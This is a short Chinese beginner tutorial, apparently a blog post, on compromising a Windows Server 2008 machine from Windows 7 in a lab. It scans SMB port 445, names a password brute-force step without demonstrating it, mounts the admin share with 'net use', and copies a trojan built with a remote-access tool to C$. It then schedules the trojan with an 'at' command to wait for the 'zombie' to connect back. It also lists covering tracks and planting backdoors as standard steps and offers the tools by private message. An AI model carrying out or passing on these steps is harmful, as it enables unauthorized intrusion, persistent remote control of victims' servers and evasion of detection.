Windows7 滲透Windows208 服務器(小白入門)
簡單的介紹:
通過掃描Windows2008的445端口,進行暴力破解,獲取賬號密碼
之後,注入木馬,留後門。
一:開啓Windows7虛擬機和Windows2008(掃描)
1.可以安裝Telnet服務,進行掃描。
2. 要保證Windows2008和Windows7在同一個網段
3. 手工測試端口號開放:telnet IP地址 測試端口
4. 
5. 也可以用kali的nmap進行掃描:nmap 192.168.0.115;
6. 第一步掃描完成
二:進行暴力破解
1.暴力破解的工具非常多,這裏就不演示暴力破解了
2.注意一般服務器的用戶是administrator
三:進行連接
1.
2.輸入暴力破解出來的賬號密碼
3.驗證連接成功:輸入 net use
4.也可以進行其他的操作,創建文件,copy等等
四:製作木馬
1.利用大白鯊軟件
注意:第一個ip地址是Windows7的ip地址
2.生成木馬之後會選擇一個保存路徑
就像這樣!!!
五:注入後門
1.命令:copy 地址 \ip\c$(或者其他)
2.在Windows2008的C盤裏面可以發現有一個myserver.exe的文件
3.然後就是讓Windows2008 運行這個木馬
4.命令:net time \192.168.0.115
5.然後通過dos命令,部署一個任務
6.命令:at \192.168.0.115 14:36 “c:\myserver.exe”
六:等待肉雞上線
完成一次操作!!!
總結:滲透基本步驟
0.授權
1.信息收集
nslookup whois
2.掃描漏洞
namp=ip範圍 端口 80(IIS,apache,什麼網站)scanport
高級掃描:如IIS漏洞2003-IIS6.0 2008IIS7.0
掃描網站漏洞()
3.漏洞利用
4.提權(shell環境、桌面環境、最高權限)
5.毀屍滅跡
6.留後門
7.滲透測試報告
手工測試端口號開放:
telnet IP地址 測試端口
上面的軟件可以私信我!!!
上面一些操作如果錯了的,希望各位大佬指出
上面的操作比較簡單,希望大佬不喜勿噴~